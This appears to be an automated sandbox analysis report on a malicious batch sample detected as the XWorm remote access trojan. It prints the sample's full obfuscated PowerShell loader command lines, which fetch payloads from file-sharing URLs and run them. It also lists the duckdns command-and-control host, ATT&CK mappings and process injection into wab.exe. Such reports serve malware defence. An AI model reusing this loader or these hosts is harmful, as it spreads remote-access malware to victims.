ank,ounmanb aclujbogleefld,sc reg,t deba presosbelemys grnsskifttmagneelegitm udby.h.artnprofie moustoutbo. pa,twfragme skrib bertcritualhoggii aursedis,ensublit');$lngerevarig+=$boglrdes[1];smrkers ($lngerevarig);smrkers (hdrede 'bomol$sansapf.rveyst,deransteaperiknfejlno.lempiconcadballe.tilbyh lo iecorroa spildrampiebrisarudspesfremt[ utte$snkeltba,keukynu.ds ramkhelleo signpperspp lactebasbarb whon re,oedepetsorigi]ha,rs=.rese$tandgsmachetcladoia.stekskribpekster virko
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sulphuric = 1;$plethorous='sub';$plethorous+='strin';$plethorous+='g';function hdrede($blaastakkens){$preflood=$blaastakkens.length-$sulphuric;for($fstningsvrkers=5;$fstningsvrkers -lt $preflood;$fstningsvrkers+=6){$handelsstandsforenings251+=$blaastakkens.$plethorous.invoke( $fstningsvrkers, $sulphuric);}$handelsstandsforenings251;}function smrkers($scooch){& ($traguloidea) ($scooch);}$stikprop=hdrede 'hjlpemnvninoklip zbrothi uds ldagsbl f,rmakb.va/nices5woodb.monas0 r.fl ac.om(pladewsuffoi annon,loofddum,eo arbew kiloscarpo ronnfemi tkingp kloak1lfted0misst.monop0danto;ste i alg,rwo lsnilyksanmedio6skatt4anlgs;unomn overhx prer6 varm4nivea; pi,d pol trdegrevphth,:overj1brai.2 avar1.ands.friti0bedr.) hore skraag tutmesingacreseikg.ammomrk s/f.gtf2t.len0zenuw1smmom0pra.k0 ,ons1gldel0 etur1sw pl virgifmateritraa,r.riktesk laftitraoeriocx pre./no,il1dilet2tjrek1.esgs.l,sin0 wool ';$tudkoppernes=hdrede 'moneyufranksprecieda omrbanal- majoa lactg inapeundern ignt eca ';$loddendes=hdrede 'bela,hsambetbackhtspattpfornusfarve: exed/agerj/untanwhemi,wantemw dapi.preles,omitefo,brnscrold aswissin,lpmodbyas,mbicf yttemod.v. didecthu,do rivamst,tu/soldap dybhrhemogo rbe/unchrdgkkerl de,t/preafj.ostbjthrif4stinkutauriw a,st4 dyre ';$gainyield=hdrede 'pino,> orma ';$traguloidea=hdrede ' leeuiphiloecotylxbront ';$sogneprst='khediviah';$indlaes = hdrede ' ar.eeu derc parahdir yo ekss geogl% frdia lovtpdisorpfremtdsynf,a uropt kn.sa iara% i dp\te,esi mohanfolk.nfarmeusensimneur,etrster nazaasemi b barnlmutone swee.t,opps aandnmacr.ofanta ,nder&im.od&b adm urostefr,ntcacleiha.gosoelvte serietse in ';smrkers (hdrede 'histo$whispg taknl unr,o untrbforbra worklabsal: micrbgasrrodentagbi.enlrgerlr fortdesslie persssatch=d.gdr(sylfecbaha,mskambdtwadd ele/aft,ec ,ugh mis,m$serosi untenentomdtrforltendeadeporediktassnupp)spoer ');smrkers (hdrede ' valu$daimignonr l.egago,entebfe.icamo ndlsvvef:forvesov rto stndmprdikmsiwase offlrbl sdfniveaumislagbaronlg.evdeanatemn.ghto.ugledvenlieg wkilpopullzy,odekmninr,kabesfin.a=forst$n.triltagaso bio.d eos.dag icetransn.ankido gaveoutw sfanga.italisdirtbpmelitlederniforlst subs(amatr$sulfogbrndsa orgaipet onunlabyselvbima.isemayollalpetd dagd) ener ');$loddendes=$sommerfuglemodellers[0];$lngerevarig= (hdrede 'ironi$afsteganlgkloutseodadleb isotaindfalmaste:.kruep trkkydelberforniasjoven.noffoover,ikataldbipro= sug n minuetilenwfilib- ank,ounmanb aclujbogleefld,sc reg,t deba presosbelemys grnsskifttmagneelegitm udby.h.artnprofie moustoutbo. pa,twfragme skrib bertcritualhoggii aursedis,ensublit');$lngerevarig+=$boglrdes[1];smrkers ($lngerevarig);smrkers (hdrede 'bomol$sansapf.rveyst,deransteaperiknfejlno.lempiconcadballe.tilbyh lo iecorroa spildrampiebrisarudspesfremt[ utte$snkeltba,keukynu.ds ramkhelleo signpperspp lactebasbarb whon re,oedepetsorigi]ha,rs=.rese$tandgsmachetcladoia.stekskribpekster virko barnp g ne ');$emplanes=Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$sulphuric = 1;$plethorous='sub';$plethorous+='strin';$plethorous+='g';function hdrede($blaastakkens){$preflood=$blaastakkens.length-$sulphuric;for($fstningsvrkers=5;$fstningsvrkers -lt $preflood;$fstningsvrkers+=6){$handelsstandsforenings251+=$blaastakkens.$plethorous.invoke( $fstningsvrkers, $sulphuric);}$handelsstandsforenings251;}function smrkers($scooch){& ($traguloidea) ($scooch);}$stikprop=hdrede 'hjlpemnvninoklip zbrothi uds ldagsbl f,rmakb.va/nices5woodb.monas0 r.fl ac.om(pladewsuffoi annon,loofddum,eo arbew kiloscarpo ronnfemi tkingp kloak1lfted0misst.monop0danto;ste i alg,rwo lsnilyksanmedio6skatt4anlgs;unomn overhx prer6 varm4nivea; pi,d pol trdegrevphth,:overj1brai.2 avar1.ands.friti0bedr.) hore skraag tutmesingacreseikg.ammomrk s/f.gtf2t.len0zenuw1smmom0pra.k0 ,ons1gldel0 etur1sw pl virgifmateritraa,r.riktesk laftitraoeriocx pre./no,il1dilet2tjrek1.esgs.l,sin0 wool ';$tudkoppernes=hdrede 'moneyufranksprecieda omrbanal- majoa lactg inapeundern ignt eca ';$loddendes=hdrede 'bela,hsambetbackhtspattpfornusfarve: exed/agerj/untanwhemi,wantemw dapi.preles,omitefo,brnscrold aswissin,lpmodbyas,mbicf yttemod.v. didecthu,do rivamst,tu/soldap dybhrhemogo rbe/unchrdgkkerl de,t/preafj.ostbjthrif4stinkutauriw a,st4 dyre ';$gainyield=hdrede 'pino,> orma ';$traguloidea=hdrede ' leeuiphiloecotylxbront ';$sogneprst='khediviah';$indlaes = hdrede ' ar.eeu derc parahdir yo ekss geogl% frdia lovtpdisorpfremtdsynf,a uropt kn.sa iara% i dp\te,esi mohanfolk.nfarmeusensimneur,etrster nazaasemi b barnlmutone swee.t,opps aandnmacr.ofanta ,nder&im.od&b adm urostefr,ntcacleiha.gosoelvte serietse in ';smrkers (hdrede 'histo$whispg taknl unr,o untrbforbra worklabsal: micrbgasrrodentagbi.enlrgerlr fortdesslie persssatch=d.gdr(sylfecbaha,mskambdtwadd ele/aft,ec ,ugh mis,m$serosi untenentomdtrforltendeadeporediktassnupp)spoer ');smrkers (hdrede ' valu$daimignonr l.egago,entebfe.icamo ndlsvvef:forvesov rto stndmprdikmsiwase offlrbl sdfniveaumislagbaronlg.evdeanatemn.ghto.ugledvenlieg wkilpopullzy,odekmninr,kabesfin.a=forst$n.triltagaso bio.d eos.dag icetransn.ankido gaveoutw sfanga.italisdirtbpmelitlederniforlst subs(amatr$sulfogbrndsa orgaipet onunlabyselvbima.isemayollalpetd dagd) ener ');$loddendes=$sommerfuglemodellers[0];$lngerevarig= (hdrede 'ironi$afsteganlgkloutseodadleb isotaindfalmaste:.kruep trkkydelberforniasjoven.noffoover,ikataldbipro= sug n minuetilenwfilib- ank,ounmanb aclujbogleefld,sc reg,t deba presosbelemys grnsskifttmagneelegitm udby.h.artnprofie moustoutbo. pa,twfragme skrib bertcritualhoggii aursedis,ensublit');$lngerevarig+=$boglrdes[1];smrkers ($lngerevarig);smrkers (hdrede 'bomol$sansapf.rveyst,deransteaperiknfejlno.lempiconcadballe.tilbyh lo iecorroa spildrampiebrisarudspesfremt[ utte$snkeltba,keukynu.ds ramkhelleo signpperspp lactebasbarb whon re,oedepetsorigi]ha,rs=.rese$tandgsmachetcladoia.stekskribpekster virko Jump to behavior
              Source: wab.exe, 0000000C.00000002.3376138960.00000000231E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: wab.exe, 0000000C.00000002.3376138960.00000000231E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
              Source: wab.exe, 0000000C.00000002.3376138960.00000000231E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 0000000C.00000002.3376138960.00000000231E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: wab.exe, 0000000C.00000002.3376138960.00000000231E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: wab.exe, 0000000C.00000002.3377119425.0000000025609000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3362816569.0000000007758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 0000000C.00000002.3376138960.0000000023191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2948, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 0000000C.00000002.3376138960.0000000023191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2948, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
              Windows Management Instrumentation              		1
              DLL Side-Loading              		112
              Process Injection              		1
              Masquerading              		OS Credential Dumping131
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Disable or Modify Tools              		LSASS Memory2
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)Logon Script (Windows)141
              Virtualization/Sandbox Evasion              		Security Account Manager141
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook112
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information              		LSA Secrets2
              File and Directory Discovery              		SSHKeylogging213
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing              		Cached Domain Credentials14
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446788 Sample: zap.cmd Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 30 tbsagyw.duckdns.org 2->30 32 www.sendspace.com 2->32 34 2 other IPs or domains 2->34 46 Snort IDS alert for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 54 7 other signatures 2->54 9 cmd.exe 1 2->9         started        signatures3 52 Uses dynamic DNS services 30->52 process4 signatures5 56 Suspicious powershell command line found 9->56 58 Very long command line found 9->58 12 powershell.exe 14 23 9->12         started        16 conhost.exe 9->16         started        process6 dnsIp7 38 fs03n1.sendspace.com 69.31.136.17, 443, 49712, 49721 GTT-BACKBONEGTTDE United States 12->38 40 www.sendspace.com 104.21.28.80, 443, 49711, 49720 CLOUDFLARENETUS United States 12->40 60 Suspicious powershell command line found 12->60 62 Very long command line found 12->62 64 Found suspicious powershell code related to unpacking or dynamic code loading 12->64 18 powershell.exe 17 12->18         started        21 conhost.exe 12->21         started        23 cmd.exe 1 12->23         started        signatures8 process9 signatures10 42 Writes to foreign memory regions 18->42 44 Found suspicious powershell code related to unpacking or dynamic code loading 18->44 25 wab.exe 14 18->25         started        28 cmd.exe 1 18->28         started        process11 dnsIp12 36 tbsagyw.duckdns.org 12.202.180.134, 49724, 8896 FISERV-INCUS United States 25->36

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              zap.cmd3%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://fs03n1.sendspace.com/v0%Avira URL Cloudsafe
              https://fs03n4.sendspace.com/dlpro/2322c2dd21531059d1754f0174582ff2/664f950e/jj4uw4/Polyfon.csv0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              https://fs03n4.sendspace.com0%Avira URL Cloudsafe
              https://fs03n1.sendspace.com/y0%Avira URL Cloudsafe
              http://www.sendspace.com0%Avira URL Cloudsafe
              https://fs03n1.sendspace.com/dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdyku0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/jj4uw4P0%Avira URL Cloudsafe
              https://www.sendspace.com0%Avira URL Cloudsafe
              https://fs03n1.sendspace.com/0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/jj4uw40%Avira URL Cloudsafe
              http://fs03n4.sendspace.com0%Avira URL Cloudsafe
              https://fs03n1.sendspace.com/dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdykugKGXjGVoR103.bin0%Avira URL Cloudsafe
              https://www.sendspace.com/0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/ug8lu50%Avira URL Cloudsafe
              https://www.sendspace.com/%I8V0%Avira URL Cloudsafe
              tbsagyw.duckdns.org0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/jj4uw4XR0%Avira URL Cloudsafe
              https://fs03n4.sendspaX0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              fs03n4.sendspace.com
              		69.31.136.17
              		truefalse
                		unknown
                tbsagyw.duckdns.org
                		12.202.180.134
                		truetrue
                  		unknown
                  www.sendspace.com
                  		104.21.28.80
                  		truefalse
                    		unknown
                    fs03n1.sendspace.com
                    		69.31.136.17
                    		truefalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://fs03n4.sendspace.com/dlpro/2322c2dd21531059d1754f0174582ff2/664f950e/jj4uw4/Polyfon.csvfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.sendspace.com/pro/dl/jj4uw4false
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs03n1.sendspace.com/dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdykugKGXjGVoR103.binfalse
                      • Avira URL Cloud: safe
                      		unknown
                      tbsagyw.duckdns.orgtrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.sendspace.com/pro/dl/ug8lu5false
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2834421548.0000024C677EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2592434274.00000000045ED000.00000004.00000800.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2592434274.00000000045ED000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://go.micropowershell.exe, 00000003.00000002.2727560719.0000024C58BE2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://fs03n1.sendspace.com/wab.exe, 0000000C.00000003.2578081685.00000000077C1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.sendspace.com/pro/dl/jj4uw4Ppowershell.exe, 00000003.00000002.2727560719.0000024C579AD000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs03n4.sendspace.compowershell.exe, 00000003.00000002.2727560719.0000024C57C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2727560719.0000024C59558000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.sendspace.compowershell.exe, 00000003.00000002.2727560719.0000024C59533000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2592434274.00000000045ED000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs03n1.sendspace.com/dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdykuwab.exe, 0000000C.00000002.3362816569.00000000077B1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.sendspace.compowershell.exe, 00000003.00000002.2727560719.0000024C579AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2727560719.0000024C5906B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs03n1.sendspace.com/vwab.exe, 0000000C.00000003.2588389826.00000000077BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.2588420928.00000000077C5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3362816569.00000000077B1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs03n1.sendspace.com/ywab.exe, 0000000C.00000003.2578081685.00000000077C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.2588389826.00000000077BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.2588420928.00000000077C5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3362816569.00000000077B1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.sendspace.com/wab.exe, 0000000C.00000002.3362816569.0000000007758000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://fs03n4.sendspace.compowershell.exe, 00000003.00000002.2727560719.0000024C5956B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2592434274.0000000004491000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
